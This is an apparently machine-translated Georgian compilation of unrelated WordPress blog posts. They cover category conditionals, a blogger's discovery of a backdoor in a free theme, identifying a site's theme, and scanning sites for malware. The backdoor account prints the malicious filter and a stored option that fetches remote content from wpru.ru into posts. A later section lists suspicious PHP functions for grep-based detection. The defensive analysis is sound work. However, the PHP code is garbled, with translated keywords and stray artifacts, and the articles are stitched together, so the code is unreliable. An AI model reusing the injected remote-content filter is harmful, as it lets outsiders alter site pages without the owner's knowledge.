წარმოვიდგინოთ, რომ თქვენ აჩვენებთ პოსტებს და თქვენ უნდა შეცვალოთ გარეგნობა კატეგორიის მიხედვით. მაგალითად, თქვენ გაქვთ ბლოკი "ავტორის შესახებ", რომელიც აჩვენებს ინფორმაციას სტატიის ავტორის შესახებ, მაგრამ არ გსურთ ამ ბლოკის ნახვა, მაგალითად, სათაურის ჩანაწერების ქვეშ, რომელშიც ის არ არის საჭირო. თქვენ ასევე შეგიძლიათ გამორთოთ კომენტარი გარკვეულ კატეგორიებში, ესკიზების ჩვენება და ა.შ. ეს ყველაფერი დამოკიდებულია თქვენს საჭიროებებზე და ფანტაზიებზე. პირადად მე ძალიან ხშირად ვიყენებ ამ მდგომარეობას.
პოსტების გაფილტვრა კატეგორიის მიხედვით, ფუნქცია დაგეხმარებათ - in_category ()... ეს ფუნქცია ამოწმებს, მიეკუთვნება თუ არა მიმდინარე ან მითითებული ჩანაწერი საჭირო კატეგორიას, კარგად ან რამდენიმე კატეგორიას. ყველაზე ხშირად, ეს ფუნქცია ნაჩვენებია ფაილში single.php, რადგან ის პასუხისმგებელია ჩანაწერების ჩვენებაზე.
ფუნქციის გამოყენების უმარტივესი გზა ასე გამოიყურება. დაამატეთ ეს კოდი single.php ფაილს, საჭიროების შემთხვევაში ჩასვით PHP ტეგებში.
PHP ტეგები ასე გამოიყურება:
თუ თქვენი თემა ძირითადად იყენებს HTML კოდს, ჩასვით ქვემოთ მოცემული კოდი ცვლილებების გარეშე. თუ თქვენ იყენებთ ძირითადად PHP-ს, მაშინ ტეგები, რომლებშიც კოდი არის ჩასმული, შეიძლება წაიშალოს.
ამ კოდში ჩვენ დავაყენეთ პირობა, რომ თუ მიმდინარე ჩანაწერი ეკუთვნის კატეგორიას ID - 12, მაშინ რაღაც უნდა იყოს ნაჩვენები. დაამატეთ რაც გინდათ ხვეული ბრეკეტების შიგნით. ეს უნდა იყოს PHP კოდი, თუ რთულია და გჭირდებათ HTML კოდის დამატება, მაშინ გატეხეთ კოდი იგივე PHP ტეგებით და კოდი გახდება ასეთი:
// აქ ვწერთ მარტივ HTML კოდს ან უბრალოდ ტექსტს.
სათაურების ID-ის დასადგენად, თქვენ უნდა გადახვიდეთ სათაურების სიაში ადმინისტრაციულ პანელში და გადაიტანეთ კურსორი თქვენთვის საჭიროზე. ბრაუზერის ფანჯრის ბოლოში გამოჩნდება ბმული, რომლის მარჯვენა მხარეს იქნება მსგავსი ID = 1, ანუ ამ კატეგორიის ID არის 1.
თუ თქვენ გჭირდებათ რამდენიმე სათაურის მითითება, მაშინ მიუთითეთ ისინი გამოყოფილი მძიმეებით. თქვენ ასევე შეიძლება დაგჭირდეთ "IF - THEN" პირობის შექმნა, მაშინ კოდი იქნება მსგავსი:
წარმოიდგინეთ, რომ თქვენ უნდა აჩვენოთ პოსტის ესკიზი სათაურში 12, ხოლო პირველი სურათი ტექსტიდან სხვა პოსტებში სხვა სათაურებიდან. ეს ხდება და როგორ უნდა გავაკეთოთ? ზემოთ მოყვანილი კოდით. თქვენ შეგიძლიათ წაიკითხოთ ჩანაწერიდან პირველი სურათის გამომავალი სტატიაში -
ახლა მინდა გაჩვენოთ კიდევ ერთი ფუნქცია, რომელიც შეიძლება დაემატოს ამ ფუნქციას. ისე ხდება, რომ სათაურებს აქვთ ქვეკატეგორიები, ანუ ბავშვების კატეგორიები. და თუ ჩანაწერი ეკუთვნის ერთ-ერთ ქვესათაურს, მაშინ პირობა გვერდს აუვლის მას. თუ ეს არის ის, რაც გჭირდებათ, მაშინ ვერაფერს დატოვებთ, მაგრამ თუ, მიუხედავად ამისა, პირობა უნდა მუშაობდეს ქვესათაურებისთვის, მაშინ თქვენ უნდა დაამატოთ პირობა. პირველ რიგში, თქვენ უნდა დაამატოთ შემდეგი ნაწილი თავად პირობას - || პოსტ_ის_შთამომავლობის_კატეგორიაში (12)... ეს არის ზარი ჩვენს ახალ ფუნქციაზე, რომელიც შეამოწმებს ქვეკატეგორიებს. დასრულებული კოდი ასე გამოიყურება:
ახალი ფუნქციის მუშაობის დასაწყებად, თქვენ უნდა დაამატოთ თავად ამ ფუნქციის კოდი, ანუ უნდა დაწეროთ იგი. ამისათვის იპოვეთ ფაილი საქაღალდეში აქტიური თემით ფუნქცია.php, რომელიც შეიცავს მორგებულ ფუნქციებს. თუ არ იცნობთ PHP-ს, უნდა დაამატოთ კოდი ფაილის ბოლომდე, მაგრამ თუ არის დახურვა PHPტეგი - ?> , შემდეგ თქვენ უნდა დაამატოთ მანამდე. თავად კოდი ასე გამოიყურება:
ფუნქცია post_is_in_descendant_category ($ cats, $ _post = null) (foreach ((მასივი) $ cats როგორც $ cat) (// get_term_children () იღებს მთელი რიცხვის ID მხოლოდ $ descendants = get_term_children ((int) $ cat, "კატეგორია" თუ); ($ descendants && in_category ($ descendants, $ _post)) დაბრუნება true;) return false;)
თუ ყველაფერი სწორად გაკეთდა, მაშინ თქვენი მდგომარეობა შეარჩევს ჩანაწერებს გარკვეული სათაურებისთვის და მათი ქვესათაურებისთვის.
დიდი ხნის წინ დავიწყე ამ სტატიის წერა, მაგრამ ყველა ხელი ბოლომდე ვერ მიაღწია, ჯერ ერთი, შემდეგ მეორე შემეშალა. ბოლოს და ბოლოს, სტატია დასრულდა და შესაძლოა ის ბევრ ადამიანს დაეხმაროს პრობლემის გადაჭრაში.
სულ ესაა, მადლობა ყურადღებისთვის. 🙂
გამარჯობა მეგობრებო. დარწმუნებული ხართ, რომ WordPress-ის უფასო შაბლონი, რომელსაც იყენებთ თქვენი ვებსაიტებისა და ბლოგებისთვის, ნამდვილად უსაფრთხოა და თავისუფალია ფარული საფრთხეებისა და მავნე კოდისგან? ამაში სრულიად დარწმუნებული ხარ? აბსოლუტურად?)
თქვენ ფიქრობთ, რომ შაბლონი გაიარეთ, წაშალეთ ფარული ბმულები და დასრულებულია სამუშაო. თქვენ პერიოდულად სკანირებთ საიტის ფაილებს ანტივირუსით, ათვალიერებთ Yandex ვებმასტერის ინსტრუმენტებს უსაფრთხოების ჩანართში და შვებით ხედავთ შეტყობინებას იქ: ” საიტზე მავნე კოდი ვერ მოიძებნა«.
ასე მეგონა. არ მინდა შენი გაწყენინება, მაგრამ...
დამალული საშიში კოდი WordPress-ის უფასო თემებში
ეს არის წერილი, რომელიც მე მივიღე ფოსტით ჩემი ჰოსტინგიდან გასულ კვირას. ცოტა ხნის წინ, მათ შემოიღეს საიტზე არსებული ყველა ფაილის რეგულარული შემოწმება მავნე შინაარსისთვის, მაგრამ მაინც აღმოაჩინეს ეს შინაარსი ჩემზე!
ეს ყველაფერი იმით დაიწყო, რომ ერთ დღეს შევედი ჩემს საიტზე და ვერ დავიწყე მისი დაწყება - გამოვიდა შეურაცხმყოფელი წარწერა php გაფართოებით არ მოიძებნა ფაილებზე. ცოტა დავიძაბე, წავედი საქაღალდის შიგთავსის შესასწავლად საიტთან ჰოსტინგზე და მაშინვე აღმოვაჩინე პრობლემა - ჩემი შაბლონის ფაილი fuctions.php დაარქვეს functions.php.malware, რაც, როგორც ჩანს, ცალსახად მიანიშნებდა - ანტივირუსი ან რაღაც მსგავსი მუშაობდა აქ) მეილზე წასვლის შემდეგ მე ვიპოვე ზემოთ მოხსენება ჰოსტერისგან.
პირველ რიგში, რა თქმა უნდა, დავიწყე ამ ფაილის შემოწმება, მისი შინაარსის შესწავლა, ყველა სახის ანტივირუსით სკანირება, ვირუსების შესამოწმებლად ათობით ონლაინ სერვისი და ა.შ. - ბოლოს ვერაფერი ვიპოვე, ყველა ერთხმად ამტკიცებდა, რომ ფაილი სრულიად უსაფრთხო იყო. რა თქმა უნდა, მე გამოვუცხადე ჩემი ეჭვი მასტერს, ისინი ამბობენ, რომ რაღაც გააფუჭე, მაგრამ იმ შემთხვევისთვის, თუ ვთხოვე, მოგეწოდებინათ ანგარიში მავნე კოდის აღმოჩენის შესახებ.
და აი რა მიპასუხეს
მივედი გუგლის ინფოზე ამ კოდის შესახებ და სერიოზულად ვფიქრობდი...
როგორ მოვძებნოთ მავნე კოდის ნაწილი შაბლონში
როგორც ირკვევა, ეს მართლაც არატრივიალური ტექნიკაა, რომელიც დაინტერესებულ პირებს საშუალებას აძლევს გადაიტანონ მონაცემები თქვენს საიტზე და შეცვალონ გვერდების შინაარსი თქვენი ცოდნის გარეშე! თუ იყენებთ უფასო შაბლონს, მაშინ მე გირჩევთ შეამოწმოთ თქვენი functions.php შემდეგი კოდისთვის:
add_filter ('content', '_bloginfo', 10001);
ფუნქცია _bloginfo ($ შინაარსი) (
გლობალური $ პოსტი;
if (is_single () && ( [ელფოსტა დაცულია](get_option ('blogoption')))! == false) (
დაბრუნება $ co;
) სხვაგვარად დააბრუნეთ $ შინაარსი;
}
php-ის ჩემი ძალიან არაღრმა ცოდნითაც კი ჩანს, რომ იქმნება გარკვეული ფილტრი, რომელიც დაკავშირებულია გლობალურ ცვლად პოსტთან და კონტენტთან, რომელიც პასუხისმგებელია შინაარსის ჩვენებაზე მხოლოდ ბლოგის პოსტის გვერდებზე (is_single condition). უკვე საეჭვოა არა? აბა, ახლა ვნახოთ, რას აჩვენებს ეს კოდი ჩვენს ვებსაიტზე.
მონაცემთა ბაზაში მოთხოვნილი საინტერესო ბლოგი ასევე ძალიან საეჭვოდ გამოიყურება. ჩვენ შევდივართ ჩვენს MySQL მონაცემთა ბაზაში და იქ ვპოულობთ ცხრილს სახელწოდებით wp_options, თუ თქვენ არ შეგიცვლიათ პრეფიქსები, მაშინ ის ასე გამოიყურება ნაგულისხმევად. და მასში ვპოულობთ იმ ხაზს, რომელიც გვაინტერესებდა, სახელწოდებით blogoption
რა ლამაზია! ჩვენ ვხედავთ შემდეგ ვარიანტს
დაბრუნების ღირებულება (file_get_contents ('http://wpru.ru/aksimet.php?id='.$post-> ID.' & m = 47 & n'));
იმათ. ჩვენთვის გარკვეული საიტიდან (და გაითვალისწინეთ რუსული) ისინი აბრუნებენ შინაარსს, რომელსაც შეუძლია რაიმეს გადატანა! ნებისმიერი რაოდენობის ბმული, მავნე კოდები, შეცვლილი ტექსტი და ა.შ. თავად საიტი მასში შესვლისას იძლევა 403 წვდომის შეცდომას, რაც გასაკვირი არ არის. რა თქმა უნდა, მეც ამოვიღე ეს ვარიანტი ბაზიდან.
დაზარალებულთა ინფორმაციით, თქვენი სტატიის ზუსტად იგივე შინაარსი, როგორც წესი, ბრუნდება მხოლოდ ერთი მოდიფიკაციით - ნებისმიერი წერტილის ნაცვლად "." ღია ბმული იყო ნიღბიანი ტექსტში! სხვათა შორის, ეს პარამეტრი იწერება მონაცემთა ბაზაში, როდესაც თავად შაბლონი დაინსტალირებულია, შემდეგ კი კოდი, რომელიც ამას წარმატებით აკეთებს, თვითგანადგურებულია. და ორი წელი ვიცხოვრე ასეთ ნაგავთან და არც ერთ ანტივირუსს ან სერვისს არ დაუფიქსირებია ეს საფრთხე ჩემთვის მთელი ამ ხნის განმავლობაში. მართალი გითხრათ, ვერ შევამჩნიე, იმუშავა თუ არა ამ ტექნიკამ ოდესმე, ან ჩემი უსაფრთხოების დანამატი ბლოკავდა თუ არა ამ ფუნქციას (ან შესაძლოა WordPressa-ს ერთ-ერთმა განახლებამ დახურა ეს ხვრელი), მაგრამ მაინც უსიამოვნოა.
მორალი უფასო ყველის შესახებ
როგორ მოგწონთ შაბლონების ჩვენი „მთარგმნელების“ (ან მათ, ვინც მათ კატალოგებში აქვეყნებენ) დახვეწილობა? ეს შენთვის არ არის ძირიდან ლინკების ამოჭრა) სამწუხაროა არ მახსოვს საიდან გადმოვწერე ჩემი შაბლონი, დიდი ხნის წინ იყო, თორემ ორიოდე მოსიყვარულეებს დავწერდი. და იმ მომენტში რომ მქონოდა იგივე გამოცდილება, რაც ახლა მაქვს, აუცილებლად არ გამოვიყენებდი უფასო შაბლონს, ან უკიდურეს შემთხვევაში, უცნობი წყაროებიდან არ გადმოვწერდი!
უფრო ადვილია იყიდო რაიმე ოფიციალური პრემიუმ შაბლონი 15-20 დოლარად ერთსა და იმავეზე და იცხოვრო მშვიდად, იმის ცოდნა, რომ მასში არ არის ხვრელები და დაშიფრული ბმულები და თუნდაც დაუცველობა იყოს, დეველოპერები აუცილებლად გამოაქვეყნებენ განახლებას, რომელშიც ეს ხვრელები დაიხურება. ( სხვათა შორის, არტიომ ცოტა ხნის წინ გამოაქვეყნა სტატია, სადაც ის საუბრობს პრემიუმ შაბლონებზე და ნებისმიერ დაინტერესებულს აძლევს სარეკლამო კოდებს სასტიკი ფასდაკლებისთვის.)
ოდესმე გიფიქრიათ, რა სახის დიზაინის თემას იყენებს კონკრეტული საიტი?
ხშირად, სრულყოფილი თემის ძიებაში, ჩვენ ვუყურებთ სხვა დასრულებულ პროექტებს, რომ ვიპოვოთ მსგავსი რამ ან შევქმნათ ჩვენი ვებგვერდი იმავე თემაზე, მხოლოდ ჩვენი ინდივიდუალური დიზაინით.
ამ გაკვეთილზე, ჩვენ გაჩვენებთ, თუ რა ინსტრუმენტები და ხრიკები შეგიძლიათ გამოიყენოთ, რათა გაიგოთ, თუ რა თემას იყენებს WordPress საიტი.
მეთოდი 1. IsItWP საიტის შემოწმება
უმარტივესი გზაა გადახვიდეთ isitwp.com-ზე და შეამოწმოთ საიტი, რომელიც გაინტერესებთ იქ.
ეს არის ონლაინ ინსტრუმენტი, რომელიც გაჩვენებთ რა თემას იყენებს WordPress და გამოიყენება თუ არა WordPress საერთოდ ამ საიტზე.
თუ საიტი მუშაობს WordPress-ზე, IsItWP შეეცდება გაარკვიოს მიმდინარე კანის სახელი.
ის ასევე შეეცდება გაარკვიოს რა აქტიური დანამატები გამოიყენება საიტზე:
თუ გაგიმართლათ და ეს არ არის მორგებული ან საბავშვო თემა, მაშინ IsItWP მოგცემთ მის სახელს და შემდეგ შეგიძლიათ იპოვოთ ეს თემა საძიებო სისტემებში.
მეთოდი 2. განსაზღვრეთ ხელით
ზოგჯერ, საიტის მფლობელები ან დეველოპერები ცვლიან მშობლიური WordPress თემის სახელს. თუ ეს ასეა, ინსტრუმენტები, როგორიცაა IsItWP, ვერ დაგეხმარებათ.
მაგრამ ასეც რომ იყოს, საიტის კოდში შეიძლება მაინც იყოს სხვადასხვა მინიშნებები, რომლებიც დაგეხმარებათ გაერკვნენ, თუ რა სახის თემაა დაინსტალირებული.
მოდით შევხედოთ.
WordPress-ის ყველა თემას უნდა ჰქონდეს ფაილი სტილი.css... ეს ფაილი შეიცავს სათაურს შიგნით, რომელიც, როგორც წესი, შეიცავს თემის სახელს, თემის ავტორს, ვერსიას და თემის დეველოპერის საიტს. ის ასევე განსაზღვრავს სხვა css სტილის შაბლონებს, რომლებსაც თემა იყენებს.
ამ ფაილის საპოვნელად, ჯერ თავად უნდა შეხვიდეთ საიტზე. დააწკაპუნეთ მარჯვენა ღილაკით სადმე მთავარ გვერდზე და გადადით წყაროს კოდის სანახავად ( გვერდის წყაროს ნახვა).
საიტის მთავარი გვერდის წყაროს კოდი გაიხსნება ბრაუზერში ახალ ჩანართში.
ახლა თქვენ უნდა იპოვოთ კოდის ხაზი, რომელიც ასე გამოიყურება:
საქმეების გასაადვილებლად, შეგიძლიათ ამ ჩანართში მოძებნოთ კოდი სნიპეტის მიხედვით " თემებიეს არის დირექტორიაში, სადაც სტილი.css.
ამრიგად, თქვენ იპოვით გზას, სადაც მდებარეობს style.css ფაილი და შეგიძლიათ გახსნათ ეს ფაილი პირდაპირ ბრაუზერში ახალ ჩანართში.
style.css-ის ზედა ნაწილში იქნება სათაური სათაურით (რაზეც ზემოთ ვისაუბრეთ). ეს არის სერვისის ინფორმაცია თემის შესახებ. ეს ასე გამოიყურება:
/ * თემის სახელი: თემის სახელი თემის URI: https://example.com ავტორი: ThemeAuthorName ავტორის URI: https://example.com აღწერა: My Theme არის მოქნილი WordPress თემა, რომელიც შექმნილია პორტფელის ვებსაიტებისთვის ვერსია: 1.1.47 ლიცენზია: GNU General Public License v2 ან უფრო ახალი ლიცენზიის URI: http://www.gnu.org/licenses/gpl-2.0.html ტექსტის დომენი: hestia ტეგები: ბლოგი, მორგებული ლოგო, პორტფოლიო, ელექტრონული კომერცია, rtl-language-support , პოსტფორმატებები, ბადის განლაგება, ერთი სვეტი, ორი სვეტი, მორგებული ფონი, მორგებული ფერები, მორგებული სათაური, მორგებული მენიუ, გამორჩეული გამოსახულების სათაური, გამორჩეული სურათები, მოქნილი სათაური, სრული სიგანე -თარგი, წებოვანი პოსტი, თემის ოფციები, ნაკადიანი კომენტარები, თარგმანი მზადაა * /
ამ ბლოკიდან შეგიძლიათ გაიგოთ თემის სახელი და დეველოპერის მისამართი. შემდეგ რჩება მხოლოდ ამ თემის ინტერნეტში პოვნა.
მეთოდი 3. როგორ მოვძებნოთ მშობელი თემა
ბევრი საიტი იყენებს საბავშვო თემებს მათი გარეგნობის მოსარგებად. და ეს არის სრულიად სწორი მიდგომა.
ამ შემთხვევაში, თუ იპოვნეთ ფაილი სტილი.cssბავშვის თემიდან, მისი სათაური შეიცავს ინფორმაციას მშობელი თემის შესახებ:
/ * თემის სახელი: My Child თემის აღწერა: უბრალოდ ბავშვის თემა ავტორი: პიტერ სმიტი ავტორის URL: დაწერეთ აქ ავტორის ბლოგის ან ვებსაიტის url შაბლონი: hestia ვერსია: 1.0 ლიცენზია: GNU General Public License v2 ან უფრო ახალი ლიცენზიის URI: http : //www.gnu.org/licenses/gpl-2.0.html ტექსტის დომენი: my-child-theme * /
ზემოთ მოცემულ მაგალითში, " შაბლონი", ანუ მშობელი თემა "Hestia" გამოიყენება ამ ბავშვის თემისთვის.
თქვენ ასევე შეგიძლიათ შეიტყოთ მშობელი თემის შესახებ მე-2 მეთოდში აღწერილი წყაროს კოდიდან. კოდში ნახავთ style.css ფაილის მითითებას არა მხოლოდ ბავშვის თემიდან, არამედ მშობლის თემიდანაც.
მაგრამ არ უნდა დაგვავიწყდეს, რომ დეველოპერს შეეძლო შეეცვალა და შეეცვალა style.css-ის ყველა სათაური თავისებურად, ამ შემთხვევაში ძალიან რთული იქნება ორიგინალური თემის დადგენა.
WordPress არის ყველაზე პოპულარული ძრავა სხვადასხვა საინფორმაციო ვებსაიტებისა და ბლოგების შესაქმნელად. თქვენი ვებსაიტის უსაფრთხოება უფრო მეტია, ვიდრე თქვენი მონაცემების უსაფრთხოება. ეს ბევრად უფრო მნიშვნელოვანია, რადგან ის ასევე არის ყველა მომხმარებლის უსაფრთხოება, ვინც კითხულობს და ენდობა თქვენს რესურსს. სწორედ ამიტომ არის ძალიან მნიშვნელოვანი, რომ საიტი არ იყოს ინფიცირებული ვირუსებით ან სხვა მავნე კოდით.
ჩვენ განვიხილავთ, თუ როგორ დავიცვათ WordPress გატეხვისგან ერთ-ერთ შემდეგ სტატიაში, ახლა კი მინდა გითხრათ, როგორ დაასკანიროთ WordPress საიტი ვირუსებისა და მავნე კოდისთვის, რათა დარწმუნდეთ, რომ ყველაფერი უსაფრთხოა.
პირველივე ვარიანტი, რაც მახსენდება არის ის, რომ თქვენ გატეხეს ჰაკერებმა და ჩადეთ მათი უკანა კარი თქვენი საიტის კოდში, რათა შეგეძლოთ სპამის გაგზავნა, ლინკების დაყენება და სხვა ცუდი რამ. ეს ზოგჯერ ხდება, მაგრამ საკმაოდ იშვიათია, თუ პროგრამულ უზრუნველყოფას დროულად განაახლებთ.
არსებობს ათასობით უფასო WordPress თემა და დანამატი, და სწორედ აქ დევს საფრთხე. ერთია, როცა ატვირთავთ შაბლონს WordPress საიტიდან და სულ სხვაა, როცა მას მარცხენა საიტზე იპოვით. არაკეთილსინდისიერ დეველოპერებს შეუძლიათ თავიანთ პროდუქტებში სხვადასხვა მავნე კოდის ჩასმა. რისკი კიდევ უფრო დიდია, თუ უფასოდ ჩამოტვირთავთ პრემიუმ შაბლონებს, სადაც ჰაკერებს შეუძლიათ უსაფრთხოდ დაამატონ უსაფრთხოების რაიმე სახის ხვრელი, რომლის მეშვეობითაც მათ შეუძლიათ შეაღწიონ და გააკეთონ ის, რაც მათ სჭირდებათ. სწორედ ამიტომ არის ძალიან მნიშვნელოვანი, შეამოწმოთ wordpress საიტი ვირუსებზე.
WordPress-ის საიტის შემოწმება ვირუსებზე
პირველი, რასაც უნდა მივმართოთ ვებსაიტის არავირუსების შემოწმებისას არის WordPress დანამატები. სწრაფად და მარტივად, შეგიძლიათ დაათვალიეროთ თქვენი საიტი და იპოვოთ კოდის საეჭვო სექციები, რომელთა ძებნა ღირს, იქნება ეს თემაში, დანამატში თუ თავად Wodpress-ის ბირთვში. მოდით გადავხედოთ რამდენიმე ყველაზე პოპულარულ დანამატს:
1. TOC
ეს ძალიან მარტივი მოდული ამოწმებს თქვენს საიტზე დაყენებულ ყველა თემას მავნე კოდისთვის. მოდული აღმოაჩენს დამალულ ბმულებს, რომლებიც დაშიფრულია base64 კოდის ჩასმით და ასევე აჩვენებს დეტალურ ინფორმაციას აღმოჩენილი პრობლემების შესახებ. უმეტეს შემთხვევაში, ნაპოვნი კოდის ნაწილები არ არის ვირუსები, მაგრამ ისინი შეიძლება პოტენციურად საშიში იყოს, ამიტომ მათ ყურადღება უნდა მიაქციოთ.
Გახსენი "გარეგნობა" -> "TAC"შემდეგ დაელოდეთ ყველა თემის შემოწმებას.
2. VIP სკანერი
ძალიან ჰგავს TOC თემის სკანერს, მაგრამ აჩვენებს უფრო დეტალურ ინფორმაციას. იგივე შესაძლებლობები ბმულების, ფარული კოდის და სხვა მავნე ჩანართების აღმოჩენისთვის. უბრალოდ გახსენით VIP Scaner პუნქტი ხელსაწყოების განყოფილებაში და გააანალიზეთ შედეგი.
შესაძლოა საკმარისია არასაჭირო ფაილების წაშლა, მაგალითად, desktop.ini. ან უფრო დეტალურად უნდა დაათვალიეროთ რა ხდება ფაილებში base64-ის გამოყენებით.
3. ანტი-მავნე პროგრამა GOTMLS.NET-ისგან
ეს მოდული საშუალებას გაძლევთ არა მხოლოდ სკანიროთ თემები და საიტის ბირთვი ვირუსებისთვის, არამედ დაიცვათ საიტი უხეში პაროლებისგან და სხვადასხვა XSS, SQLInj შეტევებისგან. ძებნა ხორციელდება ცნობილი ხელმოწერებისა და დაუცველობის საფუძველზე. ზოგიერთი დაუცველობის დაფიქსირება შესაძლებელია ადგილზე. ფაილების სკანირების დასაწყებად გახსენით "ანტი-მალვარე"გვერდით მენიუში და დააწკაპუნეთ "სკანირების გაშვება":
სანამ სკანირებას შეძლებთ, ხელმოწერის მონაცემთა ბაზები უნდა განახლდეს.
4. სიტყვაფარიკა
ეს არის WordPress-ის დაცვისა და მავნე პროგრამების სკანირების ერთ-ერთი ყველაზე პოპულარული დანამატი. გარდა სკანერისა, რომელსაც შეუძლია სანიშნეების უმეტესობის პოვნა WordPress-ის კოდში, მას აქვს მუდმივი დაცვა სხვადასხვა ტიპის შეტევებისა და უხეში პაროლებისგან. ძიების დროს, დანამატი აღმოაჩენს შესაძლო პრობლემებს სხვადასხვა დანამატებთან და თემებთან დაკავშირებით, გაცნობებთ WordPress-ის განახლების აუცილებლობის შესახებ.
გახსენით ჩანართი "WPDefence"გვერდით მენიუში და შემდეგ გადადით ჩანართზე "სკანირება"და დააჭირეთ "სკანირების დაწყება":
სკანირებას შეიძლება გარკვეული დრო დასჭირდეს, მაგრამ დასრულების შემდეგ ნახავთ აღმოჩენილი პრობლემების დეტალურ ანგარიშს.
5. ანტივირუსი
ეს არის კიდევ ერთი მარტივი მოდული, რომელიც დაასკანირებს თქვენი ვებსაიტის შაბლონს მავნე კოდისთვის. მინუსი ის არის, რომ მხოლოდ მიმდინარე შაბლონი სკანირებულია, მაგრამ ინფორმაცია საკმარისად დეტალურად არის ნაჩვენები. დაინახავთ ყველა იმ სახიფათო ფუნქციას, რაც თემაშია და შემდეგ დეტალურად გაანალიზებთ არის თუ არა ისინი რაიმე საშიშროებას. იპოვნეთ ნივთი "ანტივირუსი"პარამეტრებში და შემდეგ დააწკაპუნეთ "ახლავე დაასკანირეთ თემების შაბლონები":
6. მთლიანობის შემმოწმებელი
ასევე მიზანშეწონილია შეამოწმოთ WordPress ფაილების მთლიანობა, იმ შემთხვევაში, თუ ვირუსი უკვე დარეგისტრირებულია სადმე. ამისათვის შეგიძლიათ გამოიყენოთ Integrity Checker მოდული. ის ამოწმებს ყველა ძირითად, დანამატს და შაბლონის ფაილს ცვლილებებისთვის. სკანირების ბოლოს ნახავთ ინფორმაციას შეცვლილი ფაილების შესახებ.
ონლაინ სერვისები
ასევე არსებობს რამდენიმე ონლაინ სერვისი, რომელიც საშუალებას გაძლევთ შეამოწმოთ თქვენი wordpress საიტი ვირუსებზე ან შეამოწმოთ მხოლოდ შაბლონი. აქ არის რამდენიმე მათგანი:
themecheck.org- ჩამოტვირთავთ თემის არქივს და შეგიძლიათ უყუროთ ყველა გაფრთხილებას მასში გამოყენებული შესაძლო მავნე ფუნქციების შესახებ. თქვენ შეგიძლიათ არა მხოლოდ თქვენი თემის შესახებ ინფორმაციის ნახვა, არამედ სხვა მომხმარებლების მიერ ატვირთული სხვა თემების, ასევე თემის სხვადასხვა ვერსიების შესახებ. ყველაფერს, რასაც დანამატები პოულობენ, შეუძლიათ ამ საიტის პოვნაც. ასევე ძალიან მნიშვნელოვანია თქვენი wordpress თემის გადამოწმება.
virustotal.comარის ცნობილი რესურსი, სადაც შეგიძლიათ შეამოწმოთ თქვენი ვებსაიტი ან შაბლონის ფაილი ვირუსებზე.
ReScan.pro– ამ სერვისის გამოყენებით WordPress საიტის ვირუსებზე შემოწმება უფასოა, სტატიკური და დინამიური ანალიზი ტარდება შესაძლო გადამისამართებების გამოსავლენად, სკანერი ხსნის საიტის გვერდებს. ამოწმებს საიტს სხვადასხვა შავ სიებში.
sitecheck.sucuri.net- მარტივი სერვისი საიტის და თემების სკანირებისთვის ვირუსებისთვის. არის WordPress-ის მოდული. აღმოაჩენს საშიშ ბმულებს და სკრიპტებს.
ხელით შემოწმება
ხელით გადამოწმებაზე უკეთესი არაფერია. Linux-ს აქვს ისეთი დიდი უტილიტა, grep, რომელიც საშუალებას გაძლევთ მოძებნოთ თვითნებური ხაზების შემთხვევები ფაილებით საქაღალდეში. რჩება იმის გაგება, თუ რას ვეძებთ:
eval - ეს ფუნქცია საშუალებას გაძლევთ შეასრულოთ თვითნებური php კოდი, მას არ იყენებენ თავმოყვარე პროდუქტები, თუ რომელიმე დანამატი ან თემა იყენებს ამ ფუნქციას, თითქმის 100% სავარაუდოა, რომ იქ არის ვირუსი;
- base64_decode- დაშიფვრის ფუნქციები შეიძლება გამოყენებულ იქნას eval-თან ერთად მავნე კოდის დასამალად, მაგრამ მათი გამოყენება ასევე შესაძლებელია მშვიდობიანი მიზნებისთვის, ამიტომ ფრთხილად იყავით;
- შა1- მავნე კოდის დაშიფვრის კიდევ ერთი მეთოდი;
- გზინფლატი- შეკუმშვის ფუნქცია, იგივე სამიზნეები, ევალთან ერთად, მაგ. gzinflate (base64_decode (კოდი);
- strrev- აბრუნებს სტრიქონს უკან და არა წინ, რადგან ვარიანტი შეიძლება გამოყენებულ იქნას პრიმიტიული დაშიფვრისთვის;
- ბეჭდვა- აგზავნის ინფორმაციას ბრაუზერში, gzinflate-თან ან base64_decode-თან ერთად საშიშია;
- file_put_contents- თავად WordPress-ს ან დანამატებს ჯერ კიდევ შეუძლიათ ფაილების შექმნა ფაილურ სისტემაში, მაგრამ თუ თემა აკეთებს ამას, მაშინ უნდა იყოთ ფრთხილად და შეამოწმოთ, რატომ სჭირდება მას, ასე რომ ვირუსები შეიძლება დაინსტალირდეს;
- file_get_contents- უმეტეს შემთხვევაში ის გამოიყენება მშვიდობიანი მიზნებისთვის, მაგრამ შეიძლება გამოყენებულ იქნას მავნე კოდის ჩამოსატვირთად ან ფაილებიდან ინფორმაციის წასაკითხად;
- დახვევა- იგივე ამბავი;
- გაშლილი- ხსნის ფაილს ჩასაწერად, თქვენ არასოდეს იცით რატომ;
- სისტემა- ფუნქცია ახორციელებს ბრძანებას Linux სისტემაზე, თუ ეს კეთდება თავად თემით, დანამატით ან wordpress-ით, დიდი ალბათობით იქ არის ვირუსი;
- სიმბლაკი- ქმნის სიმბოლურ ბმულებს სისტემაში, შესაძლებელია, რომ ვირუსი ცდილობს ძირითადი ფაილური სისტემა გარედან ხელმისაწვდომი გახადოს;
- კოპირება- აკოპირებს ფაილს ერთი ადგილიდან მეორეზე;
- getcwd- აბრუნებს მიმდინარე სამუშაო დირექტორიას სახელს;
- cwd- ცვლის მიმდინარე სამუშაო საქაღალდეს;
- ini_get- იღებს ინფორმაციას PHP პარამეტრების შესახებ, ხშირად მშვიდობიანი მიზნებისთვის, მაგრამ თქვენ არასოდეს იცით;
- შეცდომის_მოხსენება (0)- გამორთავს ნებისმიერი შეცდომის შეტყობინებების გამოშვებას;
- window.top.location.href- javascript ფუნქცია, რომელიც გამოიყენება სხვა გვერდებზე გადამისამართებისთვის;
- გატეხილი- ასე რომ, ყოველი შემთხვევისთვის ვამოწმებთ, უცებ, თავად ჰაკერმა გადაწყვიტა გვეთქვა.
თქვენ შეგიძლიათ შეცვალოთ თითოეული სიტყვა შემდეგი ბრძანებით:
grep -R "გატეხილი" / var / www / გზა / to / ფაილები / wordpress / wp-content /
ალტერნატიულად, გამოიყენეთ მარტივი სკრიპტი, რომელიც მოძებნის ყველა სიტყვას ერთდროულად:
მნიშვნელობები = "base64_decode (
eval (base64_decode
gzinflate (base64_decode (
getcwd ();
strrev (
chr (ord (
cwd
ini_get
window.top.location.href
კოპირება (
შეფასება (
სისტემა (
სიმბოლური ბმული (
შეცდომის_მოხსენება (0)
ბეჭდვა
file_get_contents (
file_put_contents (
გახსენი (
გატეხილი"
cd / var / www / გზა / ფაილებისკენ / wordpress / wp-content /
